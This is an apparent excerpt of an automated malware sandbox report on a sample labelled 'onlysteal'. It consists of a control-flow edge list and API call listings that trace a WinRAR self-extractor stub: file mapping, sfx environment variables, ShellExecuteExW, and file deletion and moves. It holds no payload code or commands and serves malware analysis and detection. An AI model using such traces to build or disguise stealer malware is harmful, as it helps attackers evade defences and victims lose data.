24337->24342 24346 24b8b1 24337->24346 24347 23e617 53 API calls 24338->24347 24338->24411 24349 24b95f KiUserCallbackDispatcher 24339->24349 24339->24411 24340 24bf38 24343 24bf41 SendDlgItemMessageW 24340->24343 24344 24bf52 GetDlgItem SendMessageW 24340->24344 24341 24bf2a SendMessageW 24341->24340 24342->24339 24345 24b96b 24342->24345 24343->24344 24579 24a64d GetCurrentDirectoryW 24344->24579 24350 24b980 GetDlgItem 24345->24350 24494 24b974 24345->24494 24351 23e617 53 API calls 24346->24351 24352 24b85b 24347->24352 24349->24411 24354 24b994 SendMessageW SendMessageW 24350->24354 24355 24b9b7 SetFocus 24350->24355 24356 24b8ce SetDlgItemTextW 24351->24356 24601 23124f SHGetMalloc 24352->24601 24353 24bf82 GetDlgItem 24360 24bfa5 SetWindowTextW 24353->24360 24361 24bf9f 24353->24361 24354->24355 24357 24b9c7 24355->24357 24371 24b9e0 24355->24371 24358 24b8d9 24356->24358 24362 23e617 53 API calls 24357->24362 24365 24b8e6 GetMessageW 24358->24365 24358->24411 24580 24abab GetClassNameW 24360->24580 24361->24360 24366 24b9d1 24362->24366 24363 24be55 24367 23e617 53 API calls 24363->24367 24369 24b8fd IsDialogMessageW 24365->24369 24365->24411 24602 24d4d4 24366->24602 24373 24be65 SetDlgItemTextW 24367->24373 24369->24358 24375 24b90c TranslateMessage DispatchMessageW 24369->24375 24378 23e617 53 API calls 24371->24378 24372 24c1fc SetDlgItemTextW 24372->24411 24376 24be79 24373->24376 24375->24358 24381 23e617 53 API calls 24376->24381 24380 24ba17 24378->24380 24379 24bff0 24385 24c020 24379->24385 24388 23e617 53 API calls 24379->24388 24386 234092 _swprintf 51 API calls 24380->24386 24414 24be9c _wcslen 24381->24414 24382 24b9d9 24506 23a0b1 24382->24506 24383 24c73f 97 API calls 24383->24379 24393 24c73f 97 API calls 24385->24393 24438 24c0d8 24385->24438 24389 24ba29 24386->24389 24392 24c003 SetDlgItemTextW 24388->24392 24395 24d4d4 16 API calls 24389->24395 24390 24ba68 GetLastError 24391 24ba73 24390->24391 24512 24ac04 SetCurrentDirectoryW 
24391->24512 24399 23e617 53 API calls 24392->24399 24401 24c03b 24393->24401 24394 24c18b 24396 24c194 EnableWindow 24394->24396 24397 24c19d 24394->24397 24395->24382 24396->24397 24402 24c1ba 24397->24402 24620 2312d3 GetDlgItem EnableWindow 24397->24620 24398 24beed 24405 23e617 53 API calls 24398->24405 24403 24c017 SetDlgItemTextW 24399->24403 24412 24c04d 24401->24412 24435 24c072 24401->24435 24408 24c1e1 24402->24408 24419 24c1d9 SendMessageW 24402->24419 24403->24385 24404 24ba87 24409 24ba90 GetLastError 24404->24409 24410 24ba9e 24404->24410 24405->24411 24406 24c0cb 24415 24c73f 97 API calls 24406->24415 24408->24411 24420 23e617 53 API calls 24408->24420 24409->24410 24416 24bb11 24410->24416 24421 24baae GetTickCount 24410->24421 24422 24bb20 24410->24422 24618 249ed5 32 API calls 24412->24618 24413 24c1b0 24621 2312d3 GetDlgItem EnableWindow 24413->24621 24414->24398 24423 23e617 53 API calls 24414->24423 24415->24438 24416->24422 24424 24bd56 24416->24424 24419->24408 24427 24b862 24420->24427 24428 234092 _swprintf 51 API calls 24421->24428 24431 24bcfb 24422->24431 24432 24bcf1 24422->24432 24433 24bb39 GetModuleFileNameW 24422->24433 24429 24bed0 24423->24429 24521 2312f1 GetDlgItem ShowWindow 24424->24521 24425 24c066 24425->24435 24427->24372 24427->24411 24437 24bac7 24428->24437 24439 234092 _swprintf 51 API calls 24429->24439 24430 24c169 24619 249ed5 32 API calls 24430->24619 24434 23e617 53 API calls 24431->24434 24432->24339 24432->24431 24612 23f28c 82 API calls 24433->24612 24443 24bd05 24434->24443 24435->24406 24444 24c73f 97 API calls 24435->24444 24436 24bd66 24522 2312f1 GetDlgItem ShowWindow 24436->24522 24513 23966e 24437->24513 24438->24394 24438->24430 24446 23e617 53 API calls 24438->24446 24439->24398 24442 24bb5f 24448 234092 _swprintf 51 API calls 24442->24448 24449 234092 _swprintf 51 API calls 24443->24449 24450 24c0a0 24444->24450 24446->24438 24447 24c188 24447->24394 24452 24bb81 CreateFileMappingW 24448->24452 24453 
24bd23 24449->24453 24450->24406 24454 24c0a9 DialogBoxParamW 24450->24454 24451 24bd70 24455 23e617 53 API calls 24451->24455 24457 24bc60 __InternalCxxFrameHandler 24452->24457 24458 24bbe3 GetCommandLineW 24452->24458 24467 23e617 53 API calls 24453->24467 24454->24339 24454->24406 24459 24bd7a SetDlgItemTextW 24455->24459 24462 24bc6b ShellExecuteExW 24457->24462 24461 24bbf4 24458->24461 24523 2312f1 GetDlgItem ShowWindow 24459->24523 24460 24baed 24464 24baf4 GetLastError 24460->24464 24465 24baff 24460->24465 24613 24b425 SHGetMalloc 24461->24613 24468 24bc88 24462->24468 24464->24465 24470 23959a 80 API calls 24465->24470 24472 24bd3d 24467->24472 24480 24bccb 24468->24480 24489 24bcb7 Sleep 24468->24489 24469 24bd8c SetDlgItemTextW GetDlgItem 24473 24bdc1 24469->24473 24474 24bda9 GetWindowLongW SetWindowLongW 24469->24474 24470->24416 24471 24bc10 24614 24b425 SHGetMalloc 24471->24614 24524 24c73f 24473->24524 24474->24473 24477 24bc1c 24615 24b425 SHGetMalloc 24477->24615 24480->24432 24486 24bce1 UnmapViewOfFile CloseHandle 24480->24486 24481 24c73f 97 API calls 24483 24bddd 24481->24483 24482 24bc28 24616 23f3fa 82 API calls 2 library calls 24482->24616 24549 24da52 24483->24549 24486->24432 24487 24bc3f MapViewOfFile 24487->24457 24489->24468 24489->24480 24490 24c73f 97 API calls 24493 24be03 24490->24493 24491 24be2c 24617 2312d3 GetDlgItem EnableWindow 24491->24617 24493->24491 24495 24c73f 97 API calls 24493->24495 24494->24339 24494->24363 24495->24491 24497 231378 24496->24497 24498 23131f 24496->24498 24623 23e2c1 GetWindowLongW SetWindowLongW 24497->24623 24500 231385 24498->24500 24622 23e2e8 62 API calls 2 library calls 24498->24622 24500->24332 24500->24333 24500->24411 24502 231341 24502->24500 24503 231354 GetDlgItem 24502->24503 24503->24500 24504 231364 24503->24504 24504->24500 24505 23136a SetWindowTextW 24504->24505 24505->24500 24509 23a0bb 24506->24509 24507 23a14c 24508 23a2b2 8 API calls 24507->24508 24510 23a175 24507->24510 
24508->24510 24509->24507 24509->24510 24624 23a2b2 24509->24624 24510->24390 24510->24391 24512->24404 24514 239678 24513->24514 24515 2396d5 CreateFileW 24514->24515 24516 2396c9 24514->24516 24515->24516 24517 23971f 24516->24517 24518 23bb03 GetCurrentDirectoryW 24516->24518 24517->24460 24519 239704 24518->24519 24519->24517 24520 239708 CreateFileW 24519->24520 24520->24517 24521->24436 24522->24451 24523->24469 24525 24c749 __EH_prolog 24524->24525 24526 24bdcf 24525->24526 24656 24b314 24525->24656 24526->24481 24529 24b314 ExpandEnvironmentStringsW 24538 24c780 _wcslen _wcsrchr 24529->24538 24530 24ca67 SetWindowTextW 24530->24538 24535 24c855 SetFileAttributesW 24536 24c90f GetFileAttributesW 24535->24536 24548 24c86f __cftof _wcslen 24535->24548 24536->24538 24540 24c921 DeleteFileW 24536->24540 24538->24526 24538->24529 24538->24530 24538->24535 24541 24cc31 GetDlgItem SetWindowTextW SendMessageW 24538->24541 24545 24cc71 SendMessageW 24538->24545 24660 241fbb CompareStringW 24538->24660 24661 24a64d GetCurrentDirectoryW 24538->24661 24663 23a5d1 6 API calls 24538->24663 24664 23a55a FindClose 24538->24664 24665 24b48e 76 API calls 2 library calls 24538->24665 24666 253e3e 24538->24666 24540->24538 24542 24c932 24540->24542 24541->24538 24543 234092 _swprintf 51 API calls 24542->24543 24544 24c952 GetFileAttributesW 24543->24544 24544->24542 24546 24c967 MoveFileW 24544->24546 24545->24538 24546->24538 24547 24c97f MoveFileExW 24546->24547 24547->24538 24548->24536 24548->24538 24662 23b991 51 API calls 3 library calls 24548->24662 24550 24da5c __EH_prolog 24549->24550 24681 240659 24550->24681 24552 24da8d 24685 235b3d 24552->24685 24554 24daab 24689 237b0d 24554->24689 24558 24dafe 24705 237b9e 24558->24705 24560 24bdee 24560->24490 24562 24d6a8 24561->24562 24563 24a5c6 4 API calls 24562->24563 24564 24d6ad 24563->24564 24565 24d6b5 GetWindow 24564->24565 24566 24bf15 24564->24566 24565->24566 24569 24d6d5 24565->24569 24566->24340 24566->24341 24567 
24d6e2 GetClassNameW 25190 241fbb CompareStringW 24567->25190 24569->24566 24569->24567 24570 24d706 GetWindowLongW 24569->24570 24571 24d76a GetWindow 24569->24571 24570->24571 24572 24d716 SendMessageW 24570->24572 24571->24566 24571->24569 24572->24571 24573 24d72c GetObjectW 24572->24573 25191 24a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24573->25191 24575 24d743 25192 24a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24575->25192 25193 24a80c 8 API calls 24575->25193 24578 24d754 SendMessageW DeleteObject 24578->24571 24579->24353 24581 24abcc 24580->24581 24586 24abf1 24580->24586 25194 241fbb CompareStringW 24581->25194 24583 24abf6 SHAutoComplete 24584 24abff 24583->24584 24588 24b093 24584->24588 24585 24abdf 24585->24586 24587 24abe3 FindWindowExW 24585->24587 24586->24583 24586->24584 24587->24586 24589 24b09d __EH_prolog 24588->24589 24590 2313dc 84 API calls 24589->24590 24591 24b0bf 24590->24591 25195 231fdc 24591->25195 24594 24b0d9 24596 231692 86 API calls 24594->24596 24595 24b0eb 24597 2319af 128 API calls 24595->24597 24598 24b0e4 24596->24598 24600 24b10d __InternalCxxFrameHandler ___std_exception_copy 24597->24600 24598->24379 24598->24383 24599 231692 86 API calls 24599->24598 24600->24599 24601->24427 25203 24b568 PeekMessageW 24602->25203 24605 24d536 SendMessageW SendMessageW 24607 24d591 SendMessageW SendMessageW SendMessageW 24605->24607 24608 24d572 24605->24608 24606 24d502 24609 24d50d ShowWindow SendMessageW SendMessageW 24606->24609 24610 24d5c4 SendMessageW 24607->24610 24611 24d5e7 SendMessageW 24607->24611 24608->24607 24609->24605 24610->24611 24611->24382 24612->24442 24613->24471 24614->24477 24615->24482 24616->24487 24617->24494 24618->24425 24619->24447 24620->24413 24621->24402 24622->24502 24623->24500 24625 23a2bf 24624->24625 24626 23a2e3 24625->24626 24627 23a2d6 CreateDirectoryW 24625->24627 24645 23a231 24626->24645 24627->24626 24629 23a316 24627->24629 24632 23a325 24629->24632 24637 23a4ed 24629->24637 
24631 23a329 GetLastError 24631->24632 24632->24509 24634 23bb03 GetCurrentDirectoryW 24635 23a2ff 24634->24635 24635->24631 24636 23a303 CreateDirectoryW 24635->24636 24636->24629 24636->24631 24638 24ec50 24637->24638 24639 23a4fa SetFileAttributesW 24638->24639 24640 23a510 24639->24640 24641 23a53d 24639->24641 24642 23bb03 GetCurrentDirectoryW 24640->24642 24641->24632 24643 23a524 24642->24643 24643->24641 24644 23a528 SetFileAttributesW 24643->24644 24644->24641 24648 23a243 24645->24648 24649 24ec50 24648->24649 24650 23a250 GetFileAttributesW 24649->24650 24651 23a261 24650->24651 24652 23a23a 24650->24652 24653 23bb03 GetCurrentDirectoryW 24651->24653 24652->24631 24652->24634 24654 23a275 24653->24654 24654->24652 24655 23a279 GetFileAttributesW 24654->24655 24655->24652 24657 24b31e 24656->24657 24658 24b3f0 ExpandEnvironmentStringsW 24657->24658 24659 24b40d 24657->24659 24658->24659 24659->24538 24660->24538 24661->24538 24662->24548 24663->24538 24664->24538 24665->24538 24667 258e54 24666->24667 24668 258e61 24667->24668 24669 258e6c 24667->24669 24670 258e06 __vsnwprintf_l 21 API calls 24668->24670 24671 258e74 24669->24671 24677 258e7d _unexpected 24669->24677 24676 258e69 24670->24676 24672 258dcc _free 20 API calls 24671->24672 24672->24676 24673 258ea7 HeapReAlloc 24673->24676 24673->24677 24674 258e82 24679 2591a8 20 API calls __dosmaperr 24674->24679 24676->24538 24677->24673 24677->24674 24680 257a5e 7 API calls 2 library calls 24677->24680 24679->24676 24680->24677 24682 240666 _wcslen 24681->24682 24709 2317e9 24682->24709 24684 24067e 24684->24552 24686 240659 _wcslen 24685->24686 24687 2317e9 78 API calls 24686->24687 24688 24067e 24687->24688 24688->24554 24690 237b17 __EH_prolog 24689->24690 24726 23ce40 24690->24726 24692 237b32 24693 24eb38 8 API calls 24692->24693 24695 237b5c 24693->24695 24732 244a76 24695->24732 24697 237c7d 24698 237c87 24697->24698 24700 237cf1 24698->24700 24761 23a56d 24698->24761 24701 237d50 24700->24701 
24739 238284 24700->24739 24703 237d92 24701->24703 24767 23138b 74 API calls 24701->24767 24703->24558 24706 237bac 24705->24706 24708 237bb3 24705->24708 24707 242297 86 API calls 24706->24707 24707->24708 24710 2317ff 24709->24710 24721 23185a __InternalCxxFrameHandler 24709->24721 24711 231828 24710->24711 24722 236c36 76 API calls __vswprintf_c_l 24710->24722 24713 231887 24711->24713 24716 231847 ___std_exception_copy 24711->24716 24715 253e3e 22 API calls 24713->24715 24714 23181e 24723 236ca7 75 API calls 24714->24723 24718 23188e 24715->24718 24716->24721 24724 236ca7 75 API calls 24716->24724 24718->24721 24725 236ca7 75 API calls 24718->24725 24721->24684 24722->24714 24723->24711 24724->24721 24725->24721 24727 23ce4a __EH_prolog 24726->24727 24728 24eb38 8 API calls 24727->24728 24730 23ce8d 24728->24730 24729 24eb38 8 API calls 24731 23ceb1 24729->24731 24730->24729 24731->24692 24733 244a80 __EH_prolog 24732->24733 24734 24eb38 8 API calls 24733->24734 24735 244a9c 24734->24735 24736 237b8b 24735->24736 24738 240e46 80 API calls 24735->24738 24736->24697 24738->24736 24740 23828e __EH_prolog 24739->24740 24768 2313dc 24740->24768 24742 2382aa 24743 2382bb 24742->24743 24911 239f42 24742->24911 24746 2382f2 24743->24746 24776 231a04 24743->24776 24907 231692 24746->24907 24749 238389 24795 238430 24749->24795 24752 2383e8 24803 231f6d 24752->24803 24755 2382ee 24755->24746 24755->24749 24759 23a56d 7 API calls 24755->24759 24915 23c0c5 CompareStringW _wcslen 24755->24915 24757 2383f3 24757->24746 24807 233b2d 24757->24807 24819 23848e 24757->24819 24759->24755 24762 23a582 24761->24762 24763 23a5b0 24762->24763 25179 23a69b 24762->25179 24763->24698 24765 23a592 24765->24763 24766 23a597 FindClose 24765->24766 24766->24763 24767->24703 24769 2313e1 __EH_prolog 24768->24769 24770 23ce40 8 API calls 24769->24770 24771 231419 24770->24771 24772 24eb38 8 API calls 24771->24772 24775 231474 __cftof 24771->24775 24773 231461 24772->24773 24773->24775 24916 
23b505 24773->24916 24775->24742 24777 231a0e __EH_prolog 24776->24777 24779 231a61 24777->24779 24784 231b9b 24777->24784 24932 2313ba 24777->24932 24780 231bc7 24779->24780 24779->24784 24785 231bd4 24779->24785 24935 23138b 74 API calls 24780->24935 24783 233b2d 101 API calls 24789 231c12 24783->24789 24784->24755 24785->24783 24785->24784 24786 231c5a 24786->24784 24790 231c8d 24786->24790 24936 23138b 74 API calls 24786->24936 24788 233b2d 101 API calls 24788->24789 24789->24786 24789->24788 24790->24784 24794 239e80 79 API calls 24790->24794 24791 233b2d 101 API calls 24792 231cde 24791->24792 24792->24784 24792->24791 24793 239e80 79 API calls 24793->24779 24794->24792 24954 23cf3d 24795->24954 24797 238440 24958 2413d2 GetSystemTime SystemTimeToFileTime 24797->24958 24799 2383a3 24799->24752 24800 241b66 24799->24800 24963 24de6b 24800->24963 24804 231f72 __EH_prolog 24803->24804 24806 231fa6 24804->24806 24971 2319af 24804->24971 24806->24757 24808 233b39 24807->24808 24809 233b3d 24807->24809 24808->24757 24818 239e80 79 API calls 24809->24818 24810 233b4f 24811 233b6a 24810->24811 24812 233b78 24810->24812 24814 233baa 24811->24814 25101 2332f7 89 API calls 2 library calls 24811->25101 25102 23286b 101 API calls 3 library calls 24812->25102 24814->24757 24816 233b76 24816->24814 25103 2320d7 74 API calls 24816->25103 24818->24810 24820 238498 __EH_prolog 24819->24820 24823 2384d5 24820->24823 24830 238513 24820->24830 25127 248c8d 103 API calls 24820->25127 24822 2384f5 24824 2384fa 24822->24824 24825 23851c 24822->24825 24823->24822 24828 23857a 24823->24828 24823->24830 24824->24830 25128 237a0d 152 API calls 24824->25128 24825->24830 25129 248c8d 103 API calls 24825->25129 24828->24830 25104 235d1a 24828->25104 24830->24757 24831 238605 24831->24830 25110 238167 24831->25110 24834 238797 24835 23a56d 7 API calls 24834->24835 24838 238802 24834->24838 24835->24838 24837 23d051 82 API calls 24839 23885d 24837->24839 25116 237c0d 24838->25116 
24839->24830 24839->24837 24840 23898b 24839->24840 24842 238992 24839->24842 25130 238117 84 API calls 24839->25130 25131 232021 74 API calls 24839->25131 25132 232021 74 API calls 24840->25132 24841 238a5f 24846 238ab6 24841->24846 24858 238a6a 24841->24858 24842->24841 24845 2389e1 24842->24845 24848 238b14 24845->24848 24851 23a231 3 API calls 24845->24851 24856 238a4c 24845->24856 24846->24856 25135 237fc0 97 API calls 24846->25135 24847 239105 24853 23959a 80 API calls 24847->24853 24848->24847 24867 238b82 24848->24867 25136 2398bc 24848->25136 24849 238ab4 24850 23959a 80 API calls 24849->24850 24850->24830 24854 238a19 24851->24854 24853->24830 24854->24856 25133 2392a3 97 API calls 24854->25133 24855 23ab1a 8 API calls 24859 238bd1 24855->24859 24856->24848 24856->24849 24858->24849 25134 237db2 101 API calls 24858->25134 24862 23ab1a 8 API calls 24859->24862 24879 238be7 24862->24879 24865 238b70 25140 236e98 77 API calls 24865->25140 24867->24855 24868 238cbc 24869 238e40 24868->24869 24870 238d18 24868->24870 24873 238e52 24869->24873 24874 238e66 24869->24874 24893 238d49 24869->24893 24871 238d8a 24870->24871 24872 238d28 24870->24872 24881 238167 19 API calls 24871->24881 24876 238d6e 24872->24876 24884 238d37 24872->24884 24877 239215 123 API calls 24873->24877 24875 243377 75 API calls 24874->24875 24878 238e7f 24875->24878 24876->24893 25143 2377b8 111 API calls 24876->25143 24877->24893 25146 243020 123 API calls 24878->25146 24879->24868 24880 238c93 24879->24880 24887 23981a 79 API calls 24879->24887 24880->24868 25141 239a3c 82 API calls 24880->25141 24885 238dbd 24881->24885 25142 232021 74 API calls 24884->25142 24889 238de6 24885->24889 24890 238df5 24885->24890 24885->24893 24887->24880 25144 237542 85 API calls 24889->25144 25145 239155 93 API calls __EH_prolog 24890->25145 24896 238f85 24893->24896 25147 232021 74 API calls 24893->25147 24895 239090 24895->24847 24898 23a4ed 3 API calls 24895->24898 24896->24847 24896->24895 24897 
23903e 24896->24897 25148 239f09 SetEndOfFile 24896->25148 25122 239da2 24897->25122 24899 2390eb 24898->24899 24899->24847 25149 232021 74 API calls 24899->25149 24902 239085 24904 239620 77 API calls 24902->24904 24904->24895 24905 2390fb 25150 236dcb 76 API calls _wcschr 24905->25150 24908 2316a4 24907->24908 25166 23cee1 24908->25166 24912 239f59 24911->24912 24913 239f63 24912->24913 25178 236d0c 78 API calls 24912->25178 24913->24743 24915->24755 24917 23b50f __EH_prolog 24916->24917 24922 23f1d0 82 API calls 24917->24922 24919 23b521 24923 23b61e 24919->24923 24922->24919 24924 23b630 __cftof 24923->24924 24927 2410dc 24924->24927 24930 24109e GetCurrentProcess GetProcessAffinityMask 24927->24930 24931 23b597 24930->24931 24931->24775 24937 231732 24932->24937 24934 2313d6 24934->24793 24935->24784 24936->24790 24938 231748 24937->24938 24949 2317a0 __InternalCxxFrameHandler 24937->24949 24939 231771 24938->24939 24950 236c36 76 API calls __vswprintf_c_l 24938->24950 24941 2317c7 24939->24941 24946 23178d ___std_exception_copy 24939->24946 24943 253e3e 22 API calls 24941->24943 24942 231767 24951 236ca7 75 API calls 24942->24951 24945 2317ce 24943->24945 24945->24949 24953 236ca7 75 API calls 24945->24953 24946->24949 24952 236ca7 75 API calls 24946->24952 24949->24934 24950->24942 24951->24939 24952->24949 24953->24949 24955 23cf4d 24954->24955 24957 23cf54 24954->24957 24959 23981a 24955->24959 24957->24797 24958->24799 24960 239833 24959->24960 24962 239e80 79 API calls 24960->24962 24961 239865 24961->24957 24962->24961 24964 24de78 24963->24964 24965 23e617 53 API calls 24964->24965 24966 24de9b 24965->24966 24967 234092 _swprintf 51 API calls 24966->24967 24968 24dead 24967->24968 24969 24d4d4 16 API calls 24968->24969 24970 241b7c 24969->24970 24970->24752 24972 2319bb 24971->24972 24973 2319bf 24971->24973 24972->24806 24975 2318f6 24973->24975 24976 231945 24975->24976 24977 231908 24975->24977 24983 233fa3 24976->24983 24978 233b2d 101 API calls 
24977->24978 24981 231928 24978->24981 24981->24972 24986 233fac 24983->24986 24984 233b2d 101 API calls 24984->24986 24985 231966 24985->24981 24988 231e50 24985->24988 24986->24984 24986->24985 25000 240e08 24986->25000 24989 231e5a __EH_prolog 24988->24989 25008 233bba 24989->25008 24991 231e84 24992 231732 78 API calls 24991->24992 24995 231f0b 24991->24995 24993 231e9b 24992->24993 25036 2318a9 78 API calls 24993->25036 24995->24981 24996 231eb3 24998 231ebf _wcslen 24996->24998 25037 241b84 MultiByteToWideChar 24996->25037 25038 2318a9 78 API calls 24998->25038 25001 240e0f 25000->25001 25002 240e2a 25001->25002 25006 236c31 RaiseException _com_raise_error 25001->25006 25004 240e3b SetThreadExecutionState 25002->25004 25007 236c31 RaiseException _com_raise_error 25002->25007 25004->24986 25006->25002 25007->25004 25009 233bc4 __EH_prolog 25008->25009 25010 233bf6 25009->25010 25011 233bda 25009->25011 25013 233e51 25010->25013 25016 233c22 25010->25016 25064 23138b 74 API calls 25011->25064 25081 23138b 74 API calls 25013->25081 25015 233be5 25015->24991 25016->25015 25039 243377 25016->25039 25018 233ca3 25019 233d2e 25018->25019 25035 233c9a 25018->25035 25067 23d051 25018->25067 25049 23ab1a 25019->25049 25020 233c9f 25020->25018 25066 2320bd 78 API calls 25020->25066 25022 233c71 25022->25018 25022->25020 25023 233c8f 25022->25023 25065 23138b 74 API calls 25023->25065 25026 233d41 25029 233dd7 25026->25029 25030 233dc7 25026->25030 25073 243020 123 API calls 25029->25073 25053 239215 25030->25053 25033 233dd5 25033->25035 25074 232021 74 API calls 25033->25074 25075 242297 25035->25075 25036->24996 25037->24998 25038->24995 25040 24338c 25039->25040 25042 243396 ___std_exception_copy 25039->25042 25082 236ca7 75 API calls 25040->25082 25043 2434c6 25042->25043 25044 24341c 25042->25044 25048 243440 __cftof 25042->25048 25084 25238d RaiseException 25043->25084 25083 2432aa 75 API calls 3 library calls 25044->25083 25047 2434f2 25048->25022 25050 23ab28 
                                      control_flow_graph (edge list continued from the preceding function; rendered as a graph in the original report, node and API labels only)

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00240863: GetModuleHandleW.KERNEL32(kernel32), ref: 0024087C
                                        • Part of subcall function 00240863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0024088E
                                        • Part of subcall function 00240863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002408BF
                                        • Part of subcall function 0024A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0024A655
                                        • Part of subcall function 0024AC16: OleInitialize.OLE32(00000000), ref: 0024AC2F
                                        • Part of subcall function 0024AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0024AC66
                                        • Part of subcall function 0024AC16: SHGetMalloc.SHELL32(00278438), ref: 0024AC70
                                      • GetCommandLineW.KERNEL32 ref: 0024DF5C
                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0024DF83
                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0024DF94
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0024DFCE
                                        • Part of subcall function 0024DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0024DBF4
                                        • Part of subcall function 0024DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0024DC30
                                      • CloseHandle.KERNEL32(00000000), ref: 0024DFD7
                                      • GetModuleFileNameW.KERNEL32(00000000,0028EC90,00000800), ref: 0024DFF2
                                      • SetEnvironmentVariableW.KERNEL32(sfxname,0028EC90), ref: 0024DFFE
                                      • GetLocalTime.KERNEL32(?), ref: 0024E009
                                      • _swprintf.LIBCMT ref: 0024E048
                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0024E05A
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0024E061
                                      • LoadIconW.USER32(00000000,00000064), ref: 0024E078
                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0024E0C9
                                      • Sleep.KERNEL32(?), ref: 0024E0F7
                                      • DeleteObject.GDI32 ref: 0024E130
                                      • DeleteObject.GDI32(?), ref: 0024E140
                                      • CloseHandle.KERNEL32 ref: 0024E183
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz(
                                      • API String ID: 3049964643-1345951828
                                      • Opcode ID: 32936ba7fba3060a37b83b2c65dfb42acfb40c19961a9212532aa00eac887753
                                      • Instruction ID: 8dd1f1011974a27471719c1a557c86c8b8ffb5d825aa9d3f9fed8b8f3faa3a6b
                                      • Opcode Fuzzy Hash: 32936ba7fba3060a37b83b2c65dfb42acfb40c19961a9212532aa00eac887753
                                      • Instruction Fuzzy Hash: 83610171964205AFD724EFB4FC4DF2B37ACBB45704F01042AF94D922A1DAB49DA8CB61

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 812 24a6c2-24a6df FindResourceW 813 24a6e5-24a6f6 SizeofResource 812->813 814 24a7db 812->814 813->814 816 24a6fc-24a70b LoadResource 813->816 815 24a7dd-24a7e1 814->815 816->814 817 24a711-24a71c LockResource 816->817 817->814 818 24a722-24a737 GlobalAlloc 817->818 819 24a7d3-24a7d9 818->819 820 24a73d-24a746 GlobalLock 818->820 819->815 821 24a7cc-24a7cd GlobalFree 820->821 822 24a74c-24a76a call 250320 CreateStreamOnHGlobal 820->822 821->819 825 24a7c5-24a7c6 GlobalUnlock 822->825 826 24a76c-24a78e call 24a626 822->826 825->821 826->825 831 24a790-24a798 826->831 832 24a7b3-24a7c1 831->832 833 24a79a-24a7ae GdipCreateHBITMAPFromBitmap 831->833 832->825 833->832 834 24a7b0 833->834 834->832
                                      APIs
                                      • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0024B73D,00000066), ref: 0024A6D5
                                      • SizeofResource.KERNEL32(00000000,?,?,?,0024B73D,00000066), ref: 0024A6EC
                                      • LoadResource.KERNEL32(00000000,?,?,?,0024B73D,00000066), ref: 0024A703
                                      • LockResource.KERNEL32(00000000,?,?,?,0024B73D,00000066), ref: 0024A712
                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0024B73D,00000066), ref: 0024A72D
                                      • GlobalLock.KERNEL32(00000000), ref: 0024A73E
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0024A762
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0024A7C6
                                        • Part of subcall function 0024A626: GdipAlloc.GDIPLUS(00000010), ref: 0024A62C
                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0024A7A7
                                      • GlobalFree.KERNEL32(00000000), ref: 0024A7CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                      • String ID: PNG
                                      • API String ID: 211097158-364855578
                                      • Opcode ID: d2c5051d15e25f9ebfa2011016c1d018b65c53f3d9261fb8283e22d909eb0f5f
                                      • Instruction ID: 3467674bde77ab7bd6c19dfc90265a0b464474bd8727debe20f8c32666717ce5
